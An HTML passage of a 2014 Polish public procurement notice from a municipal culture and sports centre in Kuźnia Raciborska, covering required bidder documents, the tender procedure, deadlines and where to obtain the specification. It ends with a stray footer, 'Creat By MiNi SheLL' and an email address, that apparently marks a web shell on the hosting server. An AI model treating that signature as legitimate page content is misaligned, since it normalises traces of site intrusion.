<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Wypełniony formularz ofertowy,
2.Jeżeli Wykonawca będzie polegał na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków, jest zobowiązany udowodnić zamawiającemu, że będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.
Zobowiązanie należy złożyć w formie oryginału lub kopii poświadczonej notarialnie.
3.Dokument pełnomocnictwa do reprezentowania podmiotów występujących wspólnie konsorcjum, spółka cywilna, itp.w postępowaniu o udzielenie zamówienia załączyć, jeżeli dotyczy. Pełnomocnictwo należy złożyć w formie oryginału lub kopii poświadczonej przez te podmioty.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.kuzniakultury.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Kultury Sportu i Rekreacji
ul. Klasztorna 9
47-420 Kuźnia Raciborska.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.07.2014 godzina 09:30, miejsce: Miejski Ośrodek Kultury Sportu i Rekreacji
ul. Klasztorna 9,
47-420 Kuźnia Raciborska
Parter: sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com